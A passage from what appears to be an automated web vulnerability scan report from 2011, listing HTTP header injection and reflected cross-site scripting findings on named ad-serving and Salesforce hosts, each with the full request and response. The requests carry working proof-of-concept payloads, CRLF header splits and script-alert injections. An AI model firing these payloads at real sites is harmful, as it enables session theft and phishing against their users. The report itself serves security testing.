Set-Cookie: U=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g; expires=Thu, 17-Apr-2010 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=92f47
539632693e7
; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=bs.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Sun, 09 Jan 2011 02:02:31 GMT
Connection: close
Content-Length: 0


2.27. http://bs.serving-sys.com/BurstingPipe/adServer.bs [eyeblaster cookie]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The value of the eyeblaster cookie is copied into the Set-Cookie response header. The payload 156ae%0d%0a6ce59d4e5ce was submitted in the eyeblaster cookie. This caused a response containing an injected HTTP header.

Request

GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2111603&PluID=0&w=500&h=350&ord=3732683&ucm=true&ifl=$$ads/eyeblaster/addineyev2.jsp$$&ncu=$$http://ad.doubleclick.net/click%3Bh%3Dv8/3a8a/3/0/%2a/u%3B231345033%3B0-0%3B7%3B27597681%3B2361-500/350%3B40124842/40142629/1%3B%3B%7Eaopt%3D3/0/ff/0%3B%7Esscs%3D%3f$$\ HTTP/1.1
Host: bs.serving-sys.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: U=0a5bbe64-f3a2-4a01-921a-a3ef743897893G6020; A2=; eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=0156ae%0d%0a6ce59d4e5ce; B2=; u2=0a5bbe64-f3a2-4a01-921a-a3ef743897893G6020; E2=09MY8y8ysF; C3=; u3=1; D3=;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 1722
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Set-Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=0156ae
6ce59d4e5ce
; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=bs.serving-sys.com; path=/
Set-Cookie: A2=gn3Ka4Ki09MY0000820wsF; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B2=83xP0820wsF; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: C3=0u3F820wsF0000040_; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: D3=0u3F0035820wsF; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: E2=09MYgA92sF; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u2=0a5bbe64-f3a2-4a01-921a-a3ef743897893G602g; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u3=1; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: U=0a5bbe64-f3a2-4a01-921a-a3ef743897893G602g; expires=Thu, 17-Apr-2010 22:00:00 GMT; domain=.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Sun, 09 Jan 2011 02:06:32 GMT
Connection: close

var ebPtcl="http://";var ebBigS="ds.serving-sys.com/BurstingCachedScripts/";var ebResourcePath="ds.serving-sys.com/BurstingRes//";var ebRand=new String(Math.random());ebRand=ebRand.substr(ebRand.index
...[SNIP]...

2.28. http://www.salesforce.com/servlet/servlet.WebToLead [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.salesforce.com
Path:   /servlet/servlet.WebToLead

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 39de9%0d%0a757ae29423 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /servlet/39de9%0d%0a757ae29423 HTTP/1.1
Host: www.salesforce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Server: SFDC
Location: /servlet/39de9
757ae29423
/
Date: Sun, 09 Jan 2011 02:54:11 GMT
Connection: close
Content-Length: 91

The URL has moved to <a href="/servlet/39de9
757ae29423/">/servlet/39de9
757ae29423/</a>

2.29. https://www.salesforce.com/servlet/servlet.WebToLead [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.salesforce.com
Path:   /servlet/servlet.WebToLead

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 46573%0d%0a0d8c9d6be83 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /servlet/46573%0d%0a0d8c9d6be83 HTTP/1.1
Host: www.salesforce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Server: SFDC
Location: /servlet/46573
0d8c9d6be83
/
Date: Sun, 09 Jan 2011 05:28:21 GMT
Connection: close
Content-Length: 93

The URL has moved to <a href="/servlet/46573
0d8c9d6be83/">/servlet/46573
0d8c9d6be83/</a>

3. Cross-site scripting (reflected)
There are 712 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous-looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses.

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


3.1. http://ad.turn.com/server/pixel.htm [fpid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.turn.com
Path:   /server/pixel.htm

Issue detail

The value of the fpid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8f1a2"><script>alert(1)</script>29d113731ef was submitted in the fpid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server/pixel.htm?fpid=8f1a2"><script>alert(1)</script>29d113731ef HTTP/1.1
Host: ad.turn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://ad.turn.com/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=8977556597757145533; Domain=.turn.com; Expires=Fri, 08-Jul-2011 02:03:23 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Date: Sun, 09 Jan 2011 02:03:23 GMT
Connection: close

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
   src="http://cdn.turn.com/server/ddc.htm?uid=8977556597757145533&rnd=9049614191795073469&fpid=8f1a2"><script>alert(1)</script>29d113731ef&nu=y&t=&sp=n&purl="
   marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true"
   scrolling="no">
...[SNIP]...

3.2. http://admeld.adnxs.com/usersync [admeld_adprovider_id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://admeld.adnxs.com
Path:   /usersync

Issue detail

The value of the admeld_adprovider_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ae48c'-alert(1)-'49d3e5006f8 was submitted in the admeld_adprovider_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /usersync?calltype=admeld&admeld_user_id=6acccca4-d0e4-464e-a824-f67cb28d5556&admeld_adprovider_id=193ae48c'-alert(1)-'49d3e5006f8&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: admeld.adnxs.com
Proxy-Connection: keep-alive
Referer: http://www.pandora.com/include/communityAdEmbed.html?genre=&artist=&webname=&sz=728x90&ord=1294536136217419152&clean=0&spgs=0&tile=1&_id=leaderboard_container
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anj=Kfu=8fG7]PCxrx)0s]#%2L_'x%SEV/hnJipx9oC)FXduyOWimI4KKhq.W^v=7v!+J; sess=1; uuid2=4760492999213801733

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Mon, 10-Jan-2011 02:02:34 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Sat, 09-Apr-2011 02:02:34 GMT; domain=.adnxs.com; HttpOnly
Content-Type: application/x-javascript
Date: Sun, 09 Jan 2011 02:02:34 GMT
Content-Length: 183

document.write('<img src="http://tag.admeld.com/match?admeld_adprovider_id=193ae48c'-alert(1)-'49d3e5006f8&external_user_id=4760492999213801733&expiration=0" width="0" height="0"/>');

3.3. http://admeld.adnxs.com/usersync [admeld_callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://admeld.adnxs.com
Path:   /usersync

Issue detail

The value of the admeld_callback request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 16c38'-alert(1)-'3fc1cb53627 was submitted in the admeld_callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /usersync?calltype=admeld&admeld_user_id=6acccca4-d0e4-464e-a824-f67cb28d5556&admeld_adprovider_id=193&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match16c38'-alert(1)-'3fc1cb53627 HTTP/1.1
Host: admeld.adnxs.com
Proxy-Connection: keep-alive
Referer: http://www.pandora.com/include/communityAdEmbed.html?genre=&artist=&webname=&sz=728x90&ord=1294536136217419152&clean=0&spgs=0&tile=1&_id=leaderboard_container
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anj=Kfu=8fG7]PCxrx)0s]#%2L_'x%SEV/hnJipx9oC)FXduyOWimI4KKhq.W^v=7v!+J; sess=1; uuid2=4760492999213801733

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Mon, 10-Jan-2011 02:03:03 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Sat, 09-Apr-2011 02:03:03 GMT; domain=.adnxs.com; HttpOnly
Content-Type: application/x-javascript
Date: Sun, 09 Jan 2011 02:03:03 GMT
Content-Length: 183

document.write('<img src="http://tag.admeld.com/match16c38'-alert(1)-'3fc1cb53627?admeld_adprovider_id=193&external_user_id=4760492999213801733&expiration=0" width="0" height="0"/>');

3.4. http://ads.adxpose.com/ads/ads.js [uid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adxpose.com
Path:   /ads/ads.js

Issue detail

The value of the uid request parameter is copied into the HTML document as plain text between tags. The payload b4f4c<script>alert(1)</script>a52e440cf62 was submitted in the uid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ads/ads.js?uid=ZC45X9Axu6NOUFfX_261541b4f4c<script>alert(1)</script>a52e440cf62 HTTP/1.1
Host: ads.adxpose.com
Proxy-Connection: keep-alive
Referer: http://www.pandora.com/include/communityAdEmbed.html?genre=&artist=&webname=&sz=2000x8&ord=1294536136217419152&clean=0&spgs=0&tile=2&_id=bottom_leaderboard_container
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=93533324557B6D4C66B8D07696AFDC1E; Path=/
ETag: "0-gzip"
Cache-Control: must-revalidate, max-age=0
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM"
Set-Cookie: evlu=075d4a72-84c6-47f7-8419-eab875d87006; Domain=adxpose.com; Expires=Fri, 27-Jan-2079 05:15:56 GMT; Path=/
Content-Type: text/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 09 Jan 2011 02:01:49 GMT
Connection: close

if(typeof __ADXPOSE_CONTAINERS__==="undefined"){__ADXPOSE_CONTAINERS__={}}if(typeof __ADXPOSE_EVENT_QUEUES__==="undefined"){__ADXPOSE_EVENT_QUEUES__={}}if(typeof __adxpose__getOffset__==="undefined"){
...[SNIP]...
SE_LOG_EVENT__("000_000_3",b,i,"",Math.round(V.left)+","+Math.round(V.top),L+","+F,z,j,k,s,P)}}q=n.inView}}}if(!__ADXPOSE_PREFS__.override){__ADXPOSE_WIDGET_IN_VIEW__("container_ZC45X9Axu6NOUFfX_261541b4f4c<script>alert(1)</script>a52e440cf62".replace(/[^\w\d]/g,""),"ZC45X9Axu6NOUFfX_261541b4f4c<script>
...[SNIP]...

3.5. http://ads.bluelithium.com/st [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.bluelithium.com
Path:   /st

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1f479"-alert(1)-"9f537d45c44 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /st?ad_type=iframe&ad_size=1x1&section=1678185&admeld_user_id=6acccca4-d0e4-464e-a824-f67cb28d5556&admeld_dataprovider_id=11&admeld_callback=http://tag.admeld.com/pixel&1f479"-alert(1)-"9f537d45c44=1 HTTP/1.1
Host: ads.bluelithium.com
Proxy-Connection: keep-alive
Referer: http://www.pandora.com/include/communityAdEmbed.html?genre=&artist=&webname=&sz=2000x8&ord=1294536160339719001&clean=0&spgs=0&tile=2&_id=bottom_leaderboard_container
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 02:02:46 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Sun, 09 Jan 2011 02:02:46 GMT
Pragma: no-cache
Content-Length: 5050
Age: 0
Proxy-Connection: close

<html><head></head><body><script type="text/javascript">/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passback=0;var rm_tag_type="";rm_tag_type = "iframe"; rm_url = "http://ads.bluelithium.com/imp?1f479"-alert(1)-"9f537d45c44=1&Z=1x1&admeld_callback=http%3a%2f%2ftag.admeld.com%2fpixel&admeld_dataprovider_id=11&admeld_user_id=6acccca4%2dd0e4%2d464e%2da824%2df67cb28d5556&s=1678185&_salt=2966712294";var RM_POP_COOKIE_NAME='ym
...[SNIP]...

3.6. http://adserving.cpxinteractive.com/st [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserving.cpxinteractive.com
Path:   /st

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 645a9"-alert(1)-"c8cb9b7364 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /st?ad_type=ad&ad_size=728x90&section=628381\&645a9"-alert(1)-"c8cb9b7364=1 HTTP/1.1
Host: adserving.cpxinteractive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 02:03:52 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Sun, 09 Jan 2011 02:03:52 GMT
Pragma: no-cache
Content-Length: 4334
Age: 0
Connection: close

/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passback=0;var rm_tag_type="";rm_tag_type = "ad"; rm_url = "http://adserving.cpxinteractive.com/imp?645a9"-alert(1)-"c8cb9b7364=1&Z=728x90&s=628381%5c&_salt=3434864609";var RM_POP_COOKIE_NAME='ym_pop_freq';var RM_INT_COOKIE_NAME='ym_int_freq';if(!window.rm_crex_data){rm_crex_data=new Array();}if(rm_passback==0){rm_pb_data=new
...[SNIP]...

3.7. http://b.scorecardresearch.com/beacon.js [c1 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c1 request parameter is copied into the HTML document as plain text between tags. The payload 5975c<script>alert(1)</script>1fdfc17438e was submitted in the c1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=85975c<script>alert(1)</script>1fdfc17438e&c2=6135404&c3=9&c4=4762&c5=&c6=&c10=164121&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.pogo.com/home/home.jsp?f9258%22%3E%3Cscript%3Ealert(1)%3C/script%3E4225969d669=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Sun, 16 Jan 2011 02:02:10 GMT
Date: Sun, 09 Jan 2011 02:02:10 GMT
Connection: close
Content-Length: 3591

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
MSCORE.purge=function(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"85975c<script>alert(1)</script>1fdfc17438e", c2:"6135404", c3:"9", c4:"4762", c5:"", c6:"", c10:"164121", c15:"", c16:"", r:""});

3.8. http://b.scorecardresearch.com/beacon.js [c10 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c10 request parameter is copied into the HTML document as plain text between tags. The payload 9a333<script>alert(1)</script>8a4c3dbbfb7 was submitted in the c10 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6135404&c3=9&c4=4762&c5=&c6=&c10=1641219a333<script>alert(1)</script>8a4c3dbbfb7&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.pogo.com/home/home.jsp?f9258%22%3E%3Cscript%3Ealert(1)%3C/script%3E4225969d669=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Sun, 16 Jan 2011 02:02:14 GMT
Date: Sun, 09 Jan 2011 02:02:14 GMT
Connection: close
Content-Length: 3591

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"8", c2:"6135404", c3:"9", c4:"4762", c5:"", c6:"", c10:"1641219a333<script>alert(1)</script>8a4c3dbbfb7", c15:"", c16:"", r:""});

3.9. http://b.scorecardresearch.com/beacon.js [c15 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c15 request parameter is copied into the HTML document as plain text between tags. The payload 74eae<script>alert(1)</script>372646ead38 was submitted in the c15 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6135404&c3=9&c4=4762&c5=&c6=&c10=164121&c15=74eae<script>alert(1)</script>372646ead38 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.pogo.com/home/home.jsp?f9258%22%3E%3Cscript%3Ealert(1)%3C/script%3E4225969d669=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Sun, 16 Jan 2011 02:02:14 GMT
Date: Sun, 09 Jan 2011 02:02:14 GMT
Connection: close
Content-Length: 3591

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
th-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"8", c2:"6135404", c3:"9", c4:"4762", c5:"", c6:"", c10:"164121", c15:"74eae<script>alert(1)</script>372646ead38", c16:"", r:""});

3.10. http://b.scorecardresearch.com/beacon.js [c2 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c2 request parameter is copied into the HTML document as plain text between tags. The payload ae5ba<script>alert(1)</script>adbfd959a51 was submitted in the c2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6135404ae5ba<script>alert(1)</script>adbfd959a51&c3=9&c4=4762&c5=&c6=&c10=164121&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.pogo.com/home/home.jsp?f9258%22%3E%3Cscript%3Ealert(1)%3C/script%3E4225969d669=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Sun, 16 Jan 2011 02:02:11 GMT
Date: Sun, 09 Jan 2011 02:02:11 GMT
Connection: close
Content-Length: 3591

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
unction(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"8", c2:"6135404ae5ba<script>alert(1)</script>adbfd959a51", c3:"9", c4:"4762", c5:"", c6:"", c10:"164121", c15:"", c16:"", r:""});

3.11. http://b.scorecardresearch.com/beacon.js [c3 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c3 request parameter is copied into the HTML document as plain text between tags. The payload c8a72<script>alert(1)</script>d9a8abda3bb was submitted in the c3 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6135404&c3=9c8a72<script>alert(1)</script>d9a8abda3bb&c4=4762&c5=&c6=&c10=164121&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.pogo.com/home/home.jsp?f9258%22%3E%3Cscript%3Ealert(1)%3C/script%3E4225969d669=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
